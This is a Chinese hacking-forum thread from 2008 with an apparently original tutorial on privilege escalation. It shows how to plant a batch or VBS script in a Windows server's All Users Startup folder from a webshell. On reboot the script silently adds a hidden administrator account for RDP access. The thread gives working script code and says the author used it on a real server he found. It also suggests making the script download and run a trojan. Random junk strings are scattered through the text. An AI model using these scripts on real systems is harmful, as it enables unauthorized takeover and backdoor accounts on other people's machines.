标题:
[原创教程]
3AST提权课程之启动项提权
[打印本页]
作者:
wmmy
时间:
2008-11-2 01:17
标题:
3AST提权课程之启动项提权
大家好,我是完美蚂蚁 今天给大家带来的提权教程是
5 B+ y$ t" d. @
启动 提权
J0 _ k$ S4 c
C:\Docume~1\All Users\「开始」菜单\程序\启动
- h$ n' I; m- N! A8 w v& V2 i
在这里必须有写入权限 否则此方法无效
) z) q0 `9 F8 T3 E h8 c
因为我是在网吧 这里显示不了路径
. z7 [, z3 k7 C. o2 w
我去服务器上演示给大家看
4 i4 m3 l% ?9 I% f" O7 |7 {$ q
大家看到了把 就是这个路径 在这个里面写入文件 等候服务器从起 就会自动执行我们的
, Z# L' _7 _: w: r4 D
文件 从而运行我们的文件
* G1 e* V; c' L+ Z* |/ f9 T; c7 |
这里有两中方式 第一种是批处理
, t" i7 S: |8 q% G( y
我们来看下目前 我机器上的用户组
$ y# M; a7 Z! _' W, t% E
目前我们没有521这个用户
# W% e6 o5 L: A6 t1 ?
看到了把 已经添加到管理组中去了 刚才我们运行程序的时候 一闪而过一个黑色提示
* s2 c. p/ C" R% F% t& q$ s5 h
大家看到了吧 如果是在服务器上运行 一样会有这个提示的 细心的管理员有可能发现
3 L3 R5 |, Y/ j: O3 F0 ^7 c
下面我们来介绍第二中方法使用VBS脚本 大家都知道VBS脚本是没有这个提示的
7 @! b% f7 t$ r1 e4 X
大家看 已经成功加入了WMMY用户
6 L0 m+ y& n/ o" ?; Q: F8 e6 W
网络实战才是我们练手的目的 我已经找到一个含有这种漏洞的WBESHELL了
4 G- L" u- {/ I1 g7 z( b" I9 h
当前终端服务端口: 3389
' Z% ~; f3 f1 }( f0 Z b4 }# C# p
系统自动登录功能未开启
- C) a4 t6 f8 E5 i0 `- b
3389 已经打开了 我们只需要拥有一个管理员权限的用户就可以了
0 j& P& `2 h# H) H! D
C:\Docume~1\All Users\「开始」菜单\程序\启动 这个是默认的路径
% {. w' `$ e2 p$ | A
第一种隐蔽性太差 我们就用第二种吧
- K- Q. N, C, q. y3 N K! U
已经写入了 我们只需要等待服务器从起 那个VBS脚本文件就会把我们的用户加入进去
0 S! N$ B0 o0 a1 s/ c
从而取得了3389的登陆权限
/ ?: i+ e! x; A, l# X# x! f8 T
其实在VBS脚本中 我们不一定需要添加管理员帐户可以 直接让VBS下载运行我们的木马
# W) u( D3 f0 p5 ?! m$ h" L
基本原理都差不多 我就不多介绍了
1 Q7 |0 M: l1 w
教程结束```
( _8 H% W7 ]7 {. F& L# e
@echo off
! K2 G1 R6 s* d6 G" w
net user 521 521 /add
* c- w* L% f; k$ {; Z( q7 q) B
net localgroup administrators 521 /add
) ?+ i: S/ W! u6 o% m' {+ l- x
+ L9 \9 |$ a9 R5 N/ D4 b
on Error Resume next
7 J5 i4 M+ h! y9 j6 U" ^
set wshshell=createobject("wscript.shell")
8 Y# W& F' l0 O$ k. p
a=wshshell.run("net user wmmy$ 1227 /add",0)
" A5 Y$ J, W! {! [ s& z" E. C
a=wshshell.run("net localgroup administrators wmmy$ /add",0)
% v+ f( D3 z7 ^6 d! ^6 d1 a" Z
' n" ?. G. N& H2 y
9 I: a: ^9 c& }9 f) E7 F
点击下载
* d6 A! m) Z' g* v
作者:
zhuyahui
时间:
2008-11-2 01:26
不建议是用纳米~~很垃圾~。
作者:
zhuyahui
时间:
2008-11-2 07:41
+个分 能要是管理的权限啊~。
作者:
柔肠寸断
时间:
2008-11-2 09:22
写的不错哦~~~~~
: T$ n T( x( g- x6 q# A
: c, p c) H2 l! s9 z4 u' J: c
昨天有事情没有上了
作者:
miaoqi008
时间:
2008-11-2 19:32
顶下~一下加这么多啊~BS下~:lol
作者:
小鬼哥哥
时间:
2010-1-15 21:13
顶下小柔
+ y9 J; q0 M1 ^8 ?8 V
看看~;P
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2